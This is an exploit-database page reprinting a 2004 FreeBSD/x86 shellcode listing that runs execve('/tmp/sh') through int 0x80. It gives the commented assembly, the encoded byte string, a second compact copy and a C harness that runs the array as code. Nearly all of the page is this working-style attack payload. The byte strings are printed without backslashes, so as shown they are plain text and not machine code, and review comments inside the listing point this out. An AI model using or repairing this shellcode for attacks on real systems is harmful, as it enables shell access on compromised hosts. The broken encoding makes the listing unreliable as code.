FreeBSD/x86 – execve(/tmp/sh) Shellcode (34 bytes)
漏洞ID | 1054672 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | FreeBSD_x86 | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* FreeBSD shellcode - execve /tmp/sh
*
* Claes M. Nyberg 20020120
*
* <[email protected]>, <[email protected]>
*/
/**********************************************************
void
main()
{
__asm__("
xorl %eax, %eax # eax = 0
pushl %eax # string ends with NULL
pushl $0x68732f2f # push 'hs//' (//sh)
pushl $0x706d742f # push 'pmt/' (/tmp)
movl %esp, %ebx # ebx = argv[0] = string addr
pushl %eax # argv[1] = NULL
pushl %ebx # argv[0] = /tmp//sh
movl %esp, %edx # edx = &argv[0]
pushl %eax # envp = NULL
pushl %edx # &argv[0]
pushl %ebx # *path = argv[0]
pushl %eax # Dummy
movb $0x3b, %al # al = 59 = execve
int $0x80 # execve(argv[0], argv, NULL)
xorl %eax, %eax # eax = 0
inc %eax # eax++
pushl %eax # Exit value = 1
pushl %eax # Dummy
int $0x80 # exit(1); (eax is 1 = exit)
");
}
************************************************************/
#include <stdio.h>
#include <string.h>
static char freebsd_code[] =
"x31xc0" /* xorl %eax, %eax */
"x50" /* pushl %eax */
"x68x2fx2fx73x68" /* pushl $0x68732f2f */
"x68x2fx74x6dx70" /* pushl $0x706d742f */
"x89xe3" /* movl %esp, %ebx */
"x50" /* pushl %eax */
"x53" /* pushl %ebx */
"x89xe2" /* movl %esp, %edx */
"x50" /* pushl %eax */
"x52" /* pushl %edx */
"x53" /* pushl %ebx */
"x50" /* pushl %eax */
"xb0x3b" /* movb $0x3b, %al */
"xcdx80" /* int $0x80 */
"x31xc0" /* xorl %eax, %eax */
"x40" /* inc %eax */
"x50" /* pushl %eax */
"x50" /* pushl %eax */
"xcdx80"; /* int $0x80 */
/*
 * The same 34-byte sequence as freebsd_code, with the fragments run
 * together eight bytes per line and no per-instruction comments.
 * main() in this listing never references it.
 *
 * NOTE(review): the backslashes are missing here as well, so as printed
 * this is ASCII text rather than machine code. A file-scope identifier
 * beginning with an underscore is also reserved for the implementation.
 */
static char _freebsd_code[] =
"x31xc0x50x68x2fx2fx73x68"
"x68x2fx74x6dx70x89xe3x50"
"x53x89xe2x50x52x53x50xb0"
"x3bxcdx80x31xc0x40x50x50"
"xcdx80";
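/*
 * Test harness: prints the length of freebsd_code, then calls the array
 * through a function pointer.
 *
 * freebsd_code is ordinary writable data, so the call reaches the encoded
 * instructions only where data memory is mapped executable; where data
 * pages are non-executable the call faults instead.
 *
 * strlen() stops at the first zero byte, so the printed length is the
 * full payload size only because the encoding contains no zero bytes.
 */
int
main(void)
{
	/* Object-to-function pointer conversion: not portable ISO C, deliberate here. */
	void (*code)(void) = (void (*)(void))freebsd_code;

	/* strlen() returns size_t, which takes %zu; %d is a type mismatch. */
	printf("strlen code: %zu\n", strlen(freebsd_code));
	code();
	return 0;
}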
// milw0rm.com [2004-09-26]